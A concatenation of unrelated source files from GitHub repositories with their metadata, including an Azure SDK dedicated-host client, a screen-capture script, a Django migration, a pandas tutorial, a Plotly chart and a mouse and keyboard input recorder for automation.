host_group_name: str, host_name: str, **kwargs: Any ) -> None: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[None] request = build_delete_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, api_version=api_version, template_url=self._delete_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 202, 204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) if cls: return cls(pipeline_response, None, {}) _delete_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @distributed_trace def begin_delete( self, resource_group_name: str, host_group_name: str, host_name: str, **kwargs: Any ) -> LROPoller[None]: """Delete a dedicated host. :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host. Required. :type host_name: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either None or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[None] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[None] polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._delete_initial( # type: ignore resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, api_version=api_version, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements if cls: return cls(pipeline_response, None, {}) if polling is True: polling_method = cast(PollingMethod, ARMPolling(lro_delay, **kwargs)) # type: PollingMethod elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @distributed_trace def get( self, resource_group_name: str, host_group_name: str, host_name: str, expand: Optional[Union[str, "_models.InstanceViewTypes"]] = None, **kwargs: Any ) -> _models.DedicatedHost: """Retrieves information about a dedicated host. :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host. Required. :type host_name: str :param expand: The expand expression to apply on the operation. 'InstanceView' will retrieve the list of instance views of the dedicated host. 'UserData' is not supported for dedicated host. Known values are: "instanceView" and "userData". Default value is None. :type expand: str or ~azure.mgmt.compute.v2021_03_01.models.InstanceViewTypes :keyword callable cls: A custom type or function that will be passed the direct response :return: DedicatedHost or the result of cls(response) :rtype: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHost :raises ~azure.core.exceptions.HttpResponseError: """ error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] request = build_get_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, expand=expand, api_version=api_version, template_url=self.get.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @distributed_trace def list_by_host_group( self, resource_group_name: str, host_group_name: str, **kwargs: Any ) -> Iterable["_models.DedicatedHost"]: """Lists all of the dedicated hosts in the specified dedicated host group. Use the nextLink property in the response to get the next page of dedicated hosts. :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either DedicatedHost or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHostListResult] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) def prepare_request(next_link=None): if not next_link: request = build_list_by_host_group_request( resource_group_name=resource_group_name, host_group_name=host_group_name, subscription_id=self._config.subscription_id, api_version=api_version, template_url=self.list_by_host_group.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore else: # make call to next link with the client's api-version _parsed_next_link = urlparse(next_link) _next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query)) _next_request_params["api-version"] = self._config.api_version request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("DedicatedHostListResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return ItemPaged(get_next, extract_data) list_by_host_group.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts"} # type: ignore
[ "noreply@github.com" ]
noreply@github.com
7bde798354f8a27458cd2bd430e193c4242bee55
554635c28263a16ae538887187e447e476e09aea
/Node.py
ce1933a2bedb237200b118369ba13e6a1b343484
[]
no_license
Horofic/AI
1264fae7401392b2deb885f74dbba8bbb31fbe6c
ecc812956aed4c1bfaa2d876a23bde446b2dbc5e
refs/heads/master
2021-08-19T21:46:14.047244
2017-11-27T13:40:25
2017-11-27T13:40:25
112,200,500
0
0
null
null
null
null
UTF-8
Python
false
false
351
py
from Link import Link class Node: def __init__(self, linkedNodes): self.links = [] self.value = 0 for node in linkedNodes: self.links.append(Link(1.0, node, self)) def calculate(self): self.value = 0 for link in self.links: self.value += link.start.value * link.weightFactor
[ "ikweetnie123@hotmail.com" ]
ikweetnie123@hotmail.com
dd831f71086ba26f6e526a01c435b01b2c54ac27
7fc24b36564f348298acac77cf4900b2204be283
/scr_capture.py
e9ae16c23f21c4e041eb1d1eb93a3dea38226618
[]
no_license
shadow-identity/screen_capture
ee7e41a4b754b2de2c732f66205b86454f8c0c90
4e4c5c3b41dfa6e445a3f1bf8a4b78e7f4145a3b
refs/heads/master
2016-08-05T07:11:03.131181
2014-01-13T16:19:44
2014-01-13T16:19:44
12,612,290
1
0
null
null
null
null
UTF-8
Python
false
false
796
py
#!/bin/python # -*- coding: utf_8 -*- import subprocess import sys # U can simply change fps fps = 25 # get resolution res = subprocess.check_output("xrandr | grep \*", shell=True).split()[0] # ffmpeg command command = ("ffmpeg -f x11grab -r {fps} -s {resolution} -i :0.0 -vcodec libx264 " "-preset ultrafast -crf 0 -threads 0 {filename}") if len(sys.argv) <> 2: print "You must specify filename to save, for example:" print "{my_name} screencast.mkv".format(my_name=__file__) print "python {my_name} screencast.mkv".format(my_name=__file__) sys.exit(1) sys.exit(subprocess.call(command.format(resolution=res, filename=sys.argv[1], fps=fps), shell=True))
[ "pavel.nedr@gmail.com" ]
pavel.nedr@gmail.com
c9c28327fb58a3aa98aeddba5412a1cc8b720423
6aa85c2b0cd13c5f1f7bd94a7901baa5c074565e
/PycharmProjects/TCGA_w_bed/1create_mutation_bed.py
328109e7dea956cc1c73602c8a22049e3d0f3790
[]
no_license
rrawat/TCGA_w_bed
204da76115acb6229dfc1dc39a1ceb847a06943c
d09043895a2092611a2d3cee68b6b83910999d7e
refs/heads/master
2021-01-09T20:57:35.884731
2016-07-07T15:43:46
2016-07-07T15:43:46
62,512,727
0
0
null
null
null
null
UTF-8
Python
false
false
1,213
py
#ene name Accession Number Gene CDS length HGNC ID Sample name ID_sample ID_tumour Primary site Site subtype 1 Site subtype 2 Site subtype 3 Primary histology Histology subtype 1 Histology subtype 2 Histology subtype 3 Genome-wide screen Mutation ID Mutation CDS Mutation AA Mutation Description Mutation zygosity LOH GRCh Mutation genome position Mutation strand SNP Resistance Mutation FATHMM prediction FATHMM score Mutation somatic status Pubmed_PMID ID_STUDY Sample source Tumour origin Age with open("/Users/radhikarawat/PycharmProjects/CosmicMutantExport.tsv","U") as mutation_data_file: with open("mutation_bed.bed","w") as f: for row in mutation_data_file: row=row.split("\t") exonCount=row[8] if row[22]=="38": if "breast" in row: mutchrom,bps = row[23].split(":") mutchrom="chr"+mutchrom mutstart,mutend = bps.split("-") name=row[1] gene_name=row[0] TCGA_info=row[4] #score=row[11] f.write ("%s\t%s\t%s\t%s\t%s\t%s\n" % (mutchrom, mutstart, mutend,name,gene_name,TCGA_info))
[ "rawat.radhika@gmail.com" ]
rawat.radhika@gmail.com
e66a3429fba0505d6bd22ffa8a883b2d373757e7
e06bd7bc83b9990702afb2bac9e1b8df4f7cc578
/record.py
8da7a9551aa1b98213dec677c74cc9941c0f0d83
[]
no_license
sohamlanke/Automation
7a4c649ad05edcae6afd0be9c33a2c1a52b296b1
2b00342ada47fdd61c334f9a2ca2ffcb7f7ac768
refs/heads/main
2023-07-17T16:30:15.872150
2021-08-16T16:44:49
2021-08-16T16:44:49
396,882,076
2
0
null
null
null
null
UTF-8
Python
false
false
1,298
py
from pynput import mouse from pynput import keyboard from pynput.keyboard import Key import json import sys import time f = open("mouselogs.txt", "w") clicks = [] pressTime = 0 releaseTime = 0 def on_click(x,y,button,ispressed): global pressTime, releaseTime isdoublepress = False if ispressed: pressTime = time.time() if not ispressed: releaseTime = time.time() if(ispressed == False): diff = abs(pressTime - releaseTime) print(diff) if diff <= 0.1: isdoublepress = True print("double clicked") if(ispressed == False): dict = {"mouse": True, "x": x, "y": y, "duration": 0 if isdoublepress else 1} clicks.append(dict) # print(clicks) def on_release(keys): if keys != Key.esc: print('{0} release'.format( keys.char)) print(type(keys.char)) dict = {"mouse": False, "keypressed": keys.char} clicks.append(dict) print(clicks) if keys == Key.esc: print("Escape pressed, end string in file") f.write(json.dumps(clicks)) f.close() sys.exit() with keyboard.Listener(on_release=on_release) as k_listener, mouse.Listener(on_click=on_click) as m_listener: k_listener.join() m_listener.join()
[ "sohamlanke@gmail.com" ]
sohamlanke@gmail.com
2f85952fcbe3b65f4c744f4e3bb7f9549a012652
cb4cfcece4bc14f591b038adbc7fadccaf447a1d
/ELEVSTRS.py
d84b11ce6e30ca754fe1115b5248d18d884db818
[]
no_license
psycho-pomp/CodeChef
ba88cc8e15b3e87d39ad0c4665c6892620c09d22
881edddded0bc8820d22f42b94b9959fd6912c88
refs/heads/master
2023-03-21T06:46:14.455055
2021-03-11T12:07:48
2021-03-11T12:07:48
275,214,989
3
0
null
null
null
null
UTF-8
Python
false
false
224
py
# cook your dish here from math import sqrt t=int(input()) for _ in range(t): n,v1,v2=map(int,input().split()) t1=n/v1 t2=(sqrt(2)*n)/v2 if t2>=t1: print("Stairs") else: print("Elevator")
[ "noreply@github.com" ]
noreply@github.com
dc30cb6c2b1ae28d96b3d07b74b0dd419ceb9c5b
34a2bad3033faba30cfa21d604291e5856020ee3
/polint/q7.py
72d0782862c0843707631d69f1ea58bc0a85eef0
[]
no_license
karnatyrohit/computer_methods_assignment
79b063935381b9e2406935fd8fbc1bbc7995ebed
bed9782f956c94f11ee37e47fbbc5cffad992436
refs/heads/master
2021-01-10T09:40:28.324788
2015-12-13T15:37:17
2015-12-13T15:37:17
47,776,469
0
0
null
null
null
null
UTF-8
Python
false
false
895
py
from scipy import * from matplotlib.pyplot import * from q1 import * def f(x): y = zeros(x.shape) y = sin((pi) * x) / sqrt(1-x*x) return y x = linspace(0.1,0.9,17) #y = [f(x1) for x1 in x] y = f(x) figure(3) plot(x, y) max_exact=zeros(21) max_est=zeros(21) #n=3 # order of interpolation #xarr=linspace(0,1,30) #yarr=sin(xarr+xarr*xarr); #t=linspace(0,pi,111) for n in range(5,16): delta = 0 xx=linspace(0.1- delta,0.9 + delta,1000) #xx=array([-pi]) z=polint(x,y,xx,n) yy=z[0];dyy=z[1] y0=f(xx) figure(0) plot(xx,yy,'ro',xx,y0,'k') title("Interpolation by %dth order polynomial" % n) figure(1) semilogy(xx,abs(yy-y0),'ro',xx,abs(dyy),'k') title("Error in interpolation") legend(["Actual error","Error Est"]) max_est[n]=amax(abs(dyy)) max_exact[n]=amax(abs(yy-y0)) figure("err") semilogy(n,max_exact[n],'ro',n,max_est[n],'bo') legend(["Actual error","Error Est"]) show()
[ "karnaty.rohit@gmail.com" ]
karnaty.rohit@gmail.com
57ed8dfd72a02f6d165108493f9b836bd6aaa42f
e019891f24aa7ad9494a74b58cd6ab3ec04e9053
/archive/migrations/0010_auto_20170609_1109.py
7e6c06a873009d62e7125b560bee0a2a1e6b2464
[]
no_license
MicrobesNG/StrainArchive
b34ede9779148ea9e87efcfb2025a9088ed81fcc
789ea7a13ad94c80f79c1c203a1a27945fccb57e
refs/heads/master
2020-07-15T04:58:23.400489
2017-07-17T14:22:00
2017-07-17T14:22:00
94,303,287
0
0
null
null
null
null
UTF-8
Python
false
false
615
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-06-09 11:09 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('archive', '0009_auto_20170609_1045'), ] operations = [ migrations.AlterField( model_name='strain', name='uploader', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='uploader', to=settings.AUTH_USER_MODEL), ), ]
[ "microbesng@bio1187.bham.ac.uk" ]
microbesng@bio1187.bham.ac.uk
a81f1658dd871e8e403dcf6b4e512ae458767a2f
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
/HBKAGJZ62JkCTgYX3_15.py
5c5665b4393c00c704f2eb04cb3ee08dfe0d3464
[]
no_license
daniel-reich/ubiquitous-fiesta
26e80f0082f8589e51d359ce7953117a3da7d38c
9af2700dbe59284f5697e612491499841a6c126f
refs/heads/master
2023-04-05T06:40:37.328213
2021-04-06T20:17:44
2021-04-06T20:17:44
355,318,759
0
0
null
null
null
null
UTF-8
Python
false
false
130
py
def last(l,n): if n>len(l): return 'invalid' elif n==0: return [] else: return l[len(l)-n:]
[ "daniel.reich@danielreichs-MacBook-Pro.local" ]
daniel.reich@danielreichs-MacBook-Pro.local
0a53f26329b7e8f590b399d677a12e83e6704b2e
28a124b6a2f22a53af3b6bb754e77af88b4138e1
/DJANGO/companytodo/reports/migrations/0006_auto_20191209_0121.py
a29feb60b3e3cadd0f868274c2f14a8a99ef6f0e
[]
no_license
mebaysan/LearningKitforBeginners-Python
f7c6668a9978b52cad6cc2b969990d7bbfedc376
9e1a47fb14b3d81c5b009b74432902090e213085
refs/heads/master
2022-12-21T03:12:19.892857
2021-06-22T11:58:27
2021-06-22T11:58:27
173,840,726
18
4
null
2022-12-10T03:00:22
2019-03-04T23:56:27
Python
UTF-8
Python
false
false
350
py
# Generated by Django 2.2.7 on 2019-12-08 22:21 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('reports', '0005_auto_20191209_0120'), ] operations = [ migrations.AlterModelOptions( name='report', options={'ordering': ('-created',)}, ), ]
[ "menesbaysan@gmail.com" ]
menesbaysan@gmail.com
7be5aa773f2e343fd4b8b491a4269fdf9fff5719
ca609a94fd8ab33cc6606b7b93f3b3ef201813fb
/2017-feb/1.python/5.data-frames.py
959658216b9ad8cb6baf46f1063d69277bcff50f
[]
no_license
rajesh2win/datascience
fbc87def2a031f83ffceb4b8d7bbc31e8b2397b2
27aca9a6c6dcae3800fabdca4e3d76bd47d933e6
refs/heads/master
2021-01-20T21:06:12.488996
2017-08-01T04:39:07
2017-08-01T04:39:07
101,746,310
1
0
null
2017-08-29T09:53:49
2017-08-29T09:53:49
null
UTF-8
Python
false
false
726
py
import pandas as pd col1 = [10,20,30,40] col2 = ['abc','def','xyz','pqr'] col3 = [0,0,0,0] #creating data frame df1 = pd.DataFrame({'pid':col1, 'pname':col2,'survived':col3}) df1.shape df1.info() df1.describe() df1.head(2) df1.tail() df1['col4'] = 0 #access frame content by column/columns df1.pid df1['pid'] df1[['pid','pname']] df1[[0,1]] #dropping a column df2 = df1.drop('survived',1) #slicing rows of frame df1[0:2] df1[0:4] df1[0:] df1[:2] df1[-2:] #filtering rows of dataframe by condition type(df1.pid > 20) df1[df1.pid>20] #selecting subsets of rows and columns df1.iloc[0:2,] df1.iloc[[0,2],] df1.iloc[0:2,0] df1.iloc[0:2,[0,2]] df1.loc[0:2,['pname']] #grouping data in data frames df1.groupby('id').size()
[ "info@algorithmica.co.in" ]
info@algorithmica.co.in
c0300915f88b4cbb234193be8a08ceb789f7fd55
c24b28c0dc4ad8f83845f4c61882f1e04d49b5cd
/Plotly_Graphs/Plotly_Introduction/plotly_charts.py
d17cd6a9de3a549f8ebb82ff2712db48bbb76398
[]
no_license
Coding-with-Adam/Dash-by-Plotly
759e927759513d96060a770b1e0b0a66db13f54f
9f178f1d52536efd33827758b741acc4039d8d9b
refs/heads/master
2023-08-31T17:23:02.029281
2023-08-08T05:12:50
2023-08-08T05:12:50
234,687,337
1,293
1,822
null
2023-07-31T15:47:07
2020-01-18T05:36:28
Jupyter Notebook
UTF-8
Python
false
false
370
py
import pandas as pd import plotly.express as px dfb = pd.read_csv("bird-window-collision-death.csv") df = px.data.tips() fig = px.pie(dfb, values='Deaths', names='Bldg #', color="Side", hole=0.3) fig.update_traces(textinfo="label+percent", insidetextfont=dict(color="white")) fig.update_layout(legend={"itemclick":False}) fig.show() fig.write_image("images/fig1.png")
[ "noreply@github.com" ]
noreply@github.com